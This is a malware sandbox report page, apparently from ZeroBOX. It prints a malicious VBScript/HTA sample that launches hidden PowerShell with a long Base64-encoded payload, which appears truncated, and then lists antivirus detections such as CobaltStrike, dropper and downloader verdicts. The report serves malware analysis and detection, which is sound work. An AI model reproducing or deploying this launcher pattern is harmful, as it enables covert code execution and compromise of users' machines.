Static | ZeroBOX
No static analysis available.
<script language="VBScript">
Function var_func()
Dim var_shell
Set var_shell = CreateObject("Wscript.Shell")
var_shell.run "powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEALwA2ADEAWABhAFcALwBpAFQAQgBMACsASABIADYARgBQADAAUQBDAEsANABRADEAUgB3AGkAWgAxAFUAaABqAGYASQBBAE4AZABzAEEAMgA1AG4AcQBqAHkARQBjAEQAQgBsAC8AWQBiAFkAeAA1AFoALwA3ADcAbABnADEAawBNAGoAdgBKADcAawBpADcAawBWAEQANgBxAEsAcQB1AGUAdQByAHAANgByAEsASwA4AEwAMgBLAEkAOABmAEMAVQBtAEEAagA0AGwANQBIAFUAZQB3AEUAUAB0AEUAbwBsAFcANAA5AFkANABjAGMASABBAGYARQBWACsASgBiAHUAYgBSAEsAZgBBAHYAbgBXAC8AbgBnAGQAWQAzAHcAYQB4AGcARgAxAHEAdABoADIAeABHAEsAWQArAEwAdgAwAHMAMwBJAGkAQQB5AFAAcQBOAHcAZQBqAE8AagBWAEMAKwB6AEUAUgBWAFcAaQBtAE8AUwBDAHkARQA0AGkAUgBOADcAYwBsAEcANgBLAHAAYwBTAFAAagBSAFYANgA5AFEAMwBzAEgATgBDAHIAaAAvAEEAbQBzAEcATQA0AHEATABLAGsAdwA1AEEATgBQAE0AUAB4AFgANwA1ADgAWQBaAEkAbwBRAGoANAArAHoAMgBzADkAaABPAGsANABSAHAANwBwAE8AaQBpAHUAawBNAFIAMwBZAHIAcABCAEUAYgBwAC8ATgByAGYASQB3AHMAVABmAHgATwAxAHIAcgBlAGM
End Function
var_func
self.close
</script>
Antivirus Signature
Bkav Clean
Lionic Trojan.Script.PowerShell.4!c
tehtris Clean
ClamAV Html.Trojan.CobaltStrike-7932563-0
CMC Clean
CAT-QuickHeal VBS.Trojan.Script.38976
Skyhigh BehavesLike.HTML.Dropper.zr
ALYac VBS.Heur.Asthma.2.44D1FBF5.Gen
Malwarebytes Clean
Zillya Clean
Sangfor Malware.Generic-VBS.Save.a30bb57f
K7AntiVirus Clean
K7GW Clean
Cybereason Clean
Baidu Clean
VirIT Clean
Symantec ISB.Downloader!gen56
ESET-NOD32 PowerShell/Kryptik.EJ
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Drp]
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan.Script.Generic
BitDefender VBS.Heur.Asthma.2.44D1FBF5.Gen
NANO-Antivirus Trojan.Html.Downloader.inailz
ViRobot Clean
MicroWorld-eScan VBS.Heur.Asthma.2.44D1FBF5.Gen
Tencent Heur:Trojan.Powershell.Generic.w
Sophos ATK/PSInject-Q
F-Secure Malware.VBS/Dldr.Agent.vrfx
DrWeb VBS.Starter.296
VIPRE VBS.Heur.Asthma.2.44D1FBF5.Gen
TrendMicro Clean
FireEye VBS.Heur.Asthma.2.44D1FBF5.Gen
Emsisoft VBS.Heur.Asthma.2.44D1FBF5.Gen (B)
GData Script.Trojan.Agent.AQW
Jiangmin Clean
Varist VBS/Agent.BCY!Eldorado
Avira VBS/Dldr.Agent.vrfx
MAX malware (ai score=86)
Antiy-AVL Clean
Kingsoft Script.Ks.Malware.2618
Gridinsoft Clean
Xcitium TrojWare.Win32.BadShell.XSQ@7pmj24
Arcabit VBS.Heur.Asthma.2.44D1FBF5.Gen
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.Script.Generic
Microsoft TrojanDropper:PowerShell/Ploty.I
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee PS/Injector.d
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Dropper.Ploty!8.EEC8 (TOPIS:E0:A2riDZuTTpG)
Yandex Clean
Ikarus Trojan.PowerShell.Crypt
MaxSecure Clean
Fortinet PowerShell/Injector.D!tr
BitDefenderTheta Clean
AVG Script:SNH-gen [Drp]
Panda Clean
CrowdStrike Clean
alibabacloud Clean
No IRMA results available.